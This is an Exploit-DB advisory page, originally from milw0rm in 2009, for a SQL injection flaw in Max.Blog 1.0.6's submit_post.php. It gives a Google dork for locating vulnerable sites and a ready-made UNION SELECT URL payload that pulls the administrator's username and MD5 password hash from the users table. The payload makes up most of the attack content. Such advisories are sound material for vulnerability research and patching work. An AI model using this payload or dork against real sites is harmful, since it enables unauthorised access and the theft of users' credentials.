Max.Blog 1.0.6 - 'submit_post.php' SQL Injection

EDB-ID:

7898

CVE:

N/A

EDB Verified:

Author:

Salvatore Fresta

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-01-28

Vulnerable App: 
###################             Salvatore "drosophila" Fresta
###################


Application:    Max.Blog
                               http://www.mzbservices.com
Version:                Max.Blog <= 1.0.6
Bug:            * SQL Injection
Exploitation:   Remote
Dork:                   intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                       e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

SQL Injection:

       Requisites: magic quotes = off

       File affected: submit_post.php

       This bug allows a registered user to view username and password
(md5) of a
       registered user with the specified id (usually 1 for the admin)

       http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

############################################################################

# milw0rm.com [2009-01-28]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services